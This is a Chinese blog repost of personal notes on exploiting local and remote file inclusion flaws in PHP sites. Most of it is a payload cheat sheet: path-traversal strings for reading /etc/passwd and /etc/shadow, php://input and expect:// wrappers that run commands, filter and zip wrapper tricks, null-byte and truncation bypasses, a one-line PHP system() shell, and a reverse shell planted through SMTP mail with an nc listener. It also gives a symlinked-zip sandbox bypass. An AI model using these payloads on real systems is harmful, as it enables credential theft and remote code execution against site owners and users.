LFI/RFI漏洞相关

最新推荐文章于 2023-01-18 10:30:00 发布
最新推荐文章于 2023-01-18 10:30:00 发布
阅读量419 收藏
点赞数
原文链接:https://my.oschina.net/u/1188877/blog/823110
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

说明

日常做的一些摘抄及自己测试过程中的一些笔记,如有版权或错误欢迎留言指正。

常见敏感漏洞字段

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=

一些敏感的本地可读取路径

# 有很多,详见fuzzdb,下面仅举例部分
/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history      # 找user add,cd,MySQL,ssh,nohop看敏感目录和文件等
/etc/syscomfig/network-scripts/ifcfg-eth1
/etc/syscomfig/network-scripts/ifcfg-eth0
/proc/self/environ

常用的Payload

# 有一个paper整理很不错,大致翻一下。
# 地址: https://www.exploit-db.com/docs/40992.pdf

# 常规规则
/script.php?page=../../../../../../../../etc/passwd
/script.php?page=file://etc/passwd

# PHP Expect Wrapper 默认此php拓展并未开启
php?page=expect://ls

# PHP file://Wrapper post方式经常出现
/fi/?page=php://input&cmd=ls

# PHP php://filter
vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd  
vuln.php?page=php://filter/resource=/etc/passwd

# 上传包含php反弹shell的压缩文件
vuln.php?page=zip://path/to/file.zip%23shell

# LFI via /proc/self/environ
# 如果可能包含/proc/self/environ的话,尝试在UA中写入shell代码,然后包含/proc/self/environ执行

# Useful Shells
<? system('uname -a');?>

# Null Byte Technique
vuln.php?page=/etc/passwd%00
vuln.php?page=/etc/passwd%2500

# Truncation LFI Bypass
vuln.php?page=/etc/passwd........................................................................................
vuln.php?page=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
vuln.php?page=/etc/passwd/../../../../../../../../../../../../../../../../../..

# 日志文件包含,比如系统日志,404日志,web日志等

# Email a Reverse Shell
# 如果一个网站没有MX记录指定,使用www-data或者apache user调用系统smtp存储发送邮件的话,那么可以尝试在邮件内容中写入payload,会被存储在/var/spool/mail/www-data,访问vuln.php?page=/var/spool/mail/www-data触发反弹shell

# 具体利用
# 爆破查看是否有web容器用户
smtp-user-enum -M VRFY -U username.txt -t 10.0.0.0
# 使用web容器用户(如www-data) telnet发送邮件
telnet 10.0.0.1 25
HELO localhost
MAIL FROM:<root>
RCPT TO:<www-data>
DATA
反弹php shell代码

# 反弹后,本机连接payload中的端口
nc -lvv 8000

# 建议对照英文版阅读,可能部分词语翻译不清楚

利用php在windows下的bug

# 向任意php页面发包上传文件都会在tmp目录生成临时文件(php特性),文件名前缀为php加3个或3个以上的随机大小写字母加数字。(如: php47B6) 并且存在时间只有一瞬间。
# 而php在windows下有个bug,就是能使用<<当通配符用。使用<<符号相当于使用*号通配符。
# 依据上面特性包含文件,常见文件操作函数都受此影响。
http://localhost/file.php?b4dboy=../../../../../../../windows/tmp/php<<

# 详见作者博客:http://secoff.net/archives/223.html

一些云服务的文件读取绕过

# 创建软连接绕过沙盒限制读取文件

# 1.创建一个链接文件到/etc/passwd
ln -s /etc/passwd link

# 2. 压缩文件,同时保留链接
zip --symlinks test.zip link

# 3.上传test.zip文件,系统会自动解压缩

# 4. 代码文件当中会返回/etc/passwd的内容。

Dockerfile可控任意文件读取

# Docker的一些好玩的利用下次再说
WORKDIR /
COPY etc/passwd /tmp
VOLUME ["/etc", '/mnt']

其他

其他一些特殊CMS造成的暂且不提,如jsp WEB-INF/web.xml泄漏等

另份总结

# 感谢各位作者的付出分享。
http://blog.csdn.net/cic10235/article/details/52103984

转载于:https://my.oschina.net/u/1188877/blog/823110

weixin_33670713
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
LFI 漏洞的利用
Soul Blog
11-29 3190
LFI 漏洞的利用 参考链接1 参考链接2 LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用 1、phpinfo 漏洞信息利用 将LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件: LFI漏洞 任何显示PHPInfo()配置输出的脚本 脚本下载地址 得到脚本后,我们需要修改脚本中的攻击载荷, 使用命令 locate php-reverse 定位可用的php载荷位置 /usr/share/laudanum/php/php-reverse-s
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFIRFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。...
文件包含漏洞LFIRFI)(require()、include()函数)
Hardworking666的博客
05-10 4376
文章目录一、文件包含漏洞二、文件包含函数二、文件包含漏洞实例“百度杯”CTF比赛 2017 二月场include 一、文件包含漏洞 文件包含漏洞,是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,在文件中,包含一个文件。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。 这意味着可以创建供所有网页引用的标准页眉或菜单文件。 当页眉需要更新时,只更新一个包含文件就可以了,或者当向网站添加一张新页面时,仅仅需要修改一..
Web安全—文件包含漏洞RFI&LFI
weixin_44431280的博客
02-25 1826
文件包含函数(RFI&LFI) ASP和JSP只能实现本地文件包含,PHP既可以本地文件包含也可以远程文件包含 文件包含漏洞简介: 在日常的应用开发中,开发者会将常用的功能模块单独实现,然后通过inclue()等常见函数去单独调用对应功能的文件代码,如果此时文件包含被设置为了一个变量且未对输入的值进行过滤,攻击者恶意输入就会导致文件包含漏洞发生。 文件包含漏洞原理: 文件包含函数的值被定义为一个变量,可控制的函数变量值和恶意输入导致文件包含漏洞产生,不管什么扩展名的文件,只要被文件函数引用。 文件包
应对安全漏洞:如何将LFI变为RFI
weixin_34128411的博客
11-03 263
前言 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 常见漏洞代码 if ($_GET['method']) { include $_GET['me...
RFI远程文件包含的漏洞
weixin_30512089的博客
11-19 317
RFI(Remote File Inclusion) 远程文件包含漏洞,即服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严格,从而可以去包含一个恶意文件,攻击者就可以远程构造一个特定的恶意文件达到攻击目的。文件包含的目的程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。PHP中常用的包含调用...
WebCruiser Web 漏洞扫描器V3.3.0
02-17
* 漏洞扫描器: SQL注入(SQL注入), Cross Site Scripting(跨站), LFI(本地文件包含), RFI(远程文件包含), Redirect(重定向) 等. * 漏洞评估应用WAVSEP v1.5 SQL注入& XSS 测试用例 100% 通过. * SQL注入 ...
Burp-IndicatorsOfVulnerability:Burp扩展,可​​检查应用程序请求和响应以获取漏洞指示或攻击目标
04-16
LFI / RFI /目录遍历/ URL注入攻击的潜在目标。 AWS S3存储桶/ Azure存储容器/ Google存储容器的URL,正文和标头中的应用程序请求和响应。 应用程序请求的参数可能指示其他常见攻击媒介(类似于HUNT)的目标。 可能...
BlackWidow:基于 Python 的 Web 应用程序扫描器,用于收集目标网站上的 OWASP 漏洞的 OSINT 和模糊测试
07-24
该项目还包括 Inject-X 模糊器,用于扫描动态 URL 以查找常见的 OWASP 漏洞。 演示视频: 特征: 自动收集目标网站的所有 URL 从目标网站自动收集所有动态 URL 和参数 自动收集目标网站的所有子域 自动从目标...
PHP-Cheatsheet-Script:该脚本使用grep搜索PHP源代码(例如XSS SQLi LFIRFI)中的代码级漏洞-Search source code
03-24
LFI / RFI 大部分搜索都是由@dustyfresh创建的,他将其编译归功于他! 我只是将整个过程自动化到这个脚本中 用法:编辑路径以指向要检查的项目的根目录。 (/ var / www / html / cms /) chmod + x <脚本> 。/...
LFI漏洞利用总结(文件包含)
qq_60115503的博客
04-19 6141
原因 LFI产生的原因是由于程序员未对用户可控变量进行输入检查,此漏洞的影响可能导致泄露服务器上的敏感文件,如若攻击者能够通过其他方式在Web服务器上放置代码,那么他们便可以执行任意命令 涉及到的函数 主要涉及到的函数 include() require() include_once() require_once() magic_quotes_gpc() allow_url_fopen() allow_url_include() move_uploaded_file()
LFI漏洞利用总结
ncafei的博客
03-14 6349
主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、pos
Web安全领域的探索之远程文件包含漏洞LFI
Innocence_0的博客
01-18 1373
Web安全领域的探索之远程文件包含漏洞LFI
文件包含LFI漏洞Getshell日志文件目录遍历
qq_60115503的博客
05-13 506
文件包含漏洞的出现及危害 文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的文件。如果一个文件包含这个漏洞,为了方便起见,经常在开发阶段就实施。由于它经常用于程序开发阶段,所以这就为后来的攻击埋下了伏笔并导致了各种基于文件的攻击。 文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件使用硬编码,一般是不会出现安全问题,但是
php Wrapper LFI,LFI漏洞利用总结(转载)
weixin_33205735的博客
03-16 580
主要涉及到的函数include(),require()、include_once(),require_once()magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file()、readfile() file()、and file_get_contents()、upload_tmp_dir()、post_m...
文件包含(LFI/RFI)
猎荒者
04-18 768
“惩恶扬善,取财有道” 这八个字应该是这个时代,白帽子职业,最有尊严的生存方式。 0x00 环境准备 phpstudy sublime firefox(hackbar) 0x01 本地文件包含(LFI) 被包含的文件在服务器本地 1. 常见本地包含 ① show_1.php <?php if ($_GET['page']) { include($_GET['page']);...
LFI
vergilben的学习日记
03-22 1322
LFI漏洞 本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发方便,常常会用到包含。比如把一系列功能函数都写进function.php中,之后当某个文件需要使用时直接调用定义的函数。本地包含漏洞是php中一种典型的高危漏洞,由于程序员未对用户可控变量的输入进行检查,导致用户可以控制被包含的文件,成功利用时可以使web server将特定文件当成php执行,...
文件包含\\&LFI\\&RFI\\&伪协议编码算法\\&代码审计
最新发布
09-02
RFI漏洞则是指应用程序中允许用户通过远程URL来包含外部文件的漏洞。这两种漏洞都可能导致攻击者获取敏感信息或者执行恶意代码。 伪协议编码算法是一种常见的技术,用于绕过安全控制并执行特定的操作。在这里提到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值